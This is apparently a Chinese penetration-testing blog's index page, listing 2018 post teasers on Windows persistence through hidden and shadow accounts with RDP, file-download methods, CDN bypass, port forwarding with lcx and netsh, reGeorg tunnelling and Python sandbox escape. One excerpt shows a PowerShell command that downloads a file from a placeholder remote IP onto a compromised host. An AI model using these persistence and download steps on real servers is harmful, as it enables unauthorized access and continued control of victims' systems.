权限维持之从隐藏账户到影子账户 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 1.4k | 阅读时长 ≈ 2 分钟0x01 关于权限维持很多时候,当我们获得到一个windows服务器的权限后,若某天服务器的管理员发现后修补了漏洞,那么我们就可能失去了这台服务器的权限了,因此权限维持就很有必要了,对于windows服务器来说,我们可以添加一个账户,打开它的3389端口,从而维持我们对一个服务器的权限。 阅读全文 »
Windows7升级powershell2到powershell3 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 570 | 阅读时长 ≈ 1 分钟0x01 前言最近在学习Windows渗透,其实说白了就是学习各种Windows的特性,昨天接触到了一款powershell渗透框架, 叫做nishang,学习的过程中发现脚本就是不执行,后来才发现是因为我用的虚拟机是windows7,默认的powershell版本是2.0,而nishang需要的是powershell 3.0以上才可以使用,故而记录一下我升级的历程。 阅读全文 »
渗透中15种文件下载的方法 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 2.8k | 阅读时长 ≈ 5 分钟0x01 PowerShell 文件下载12$p = new-object system.net.webclient$p.downloadfile("http://xx.xx.xx.xx\file","c:\xxx\xx\file") 阅读全文 »
绕过CDN获取真实IP 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 1.2k | 阅读时长 ≈ 2 分钟0x01 CDN在渗透过程中,经常会遇到网站使用了CDN,而CDN的虚假ip往往会给我们造成各种困难,这里我搜集了很多资料,总结一下关于绕过CDN获取真实IP的方法。 阅读全文 »
利用VMware进行端口映射(模拟外网访问内网) 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 691 | 阅读时长 ≈ 1 分钟0x01 实验材料两台笔记本,vmware workstation软件,安装好的ubuntu虚拟机并且搭建好了web服务 阅读全文 »
端口映射 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 704 | 阅读时长 ≈ 1 分钟0x01 端口映射什么是端口映射呢?端口映射就是将外网IP映射到内网IP,使得外网用户通过访问这个外网IP就能够获得对应的内网服务器的服务,这么说可能比较抽象,下面会说的更详细一些。 阅读全文 »
利用lcx进行访问内网 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 656 | 阅读时长 ≈ 1 分钟0x01 前言这周开始准备学习内网渗透的知识,昨天利用Vmware搭建了域环境,今天做了一个小实验,利用lcx端口转发来访问内网服务器。这里需要一个外网ip,所以去阿里云买了一个服务器,学生价9.9一个月还是挺不错的~ 阅读全文 »
利用netsh进行端口转发 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 1.4k | 阅读时长 ≈ 2 分钟0x01 简介NetSH (Network Shell) 是windows系统本身提供的功能强大的网络配置命令行工具。故我们可以使用netsh进行内网端口转发。思考了一下,发现这个是当我们进入内网的时候可以使用这个工具,好像外网访问内网是不行的(我觉得是这样的(╯▽╰ )),但是lcx就可以外网访问内网呀~ 阅读全文 »
利用reGeog和proxifier进行内网渗透 发表于 2018-06-10 | 分类于 渗透测试 | 热度: ℃ 本文字数: 654 | 阅读时长 ≈ 1 分钟0x01 reGeorg网上说reGeorg是reDuh的继承者,但是表示reDuh没有用过。。。下载的话Github上有,大概就是这样子滴 阅读全文 »
Python_Sandbox_Bypass 发表于 2018-06-05 | 更新于 2018-06-10 | 分类于 Python安全 | 热度: ℃ 本文字数: 1.4k | 阅读时长 ≈ 2 分钟0x01 基础关于python沙箱逃逸的基础之前的博文写过,如果有不会的可以去看看 点我0x02 Python Sandbox 阅读全文 »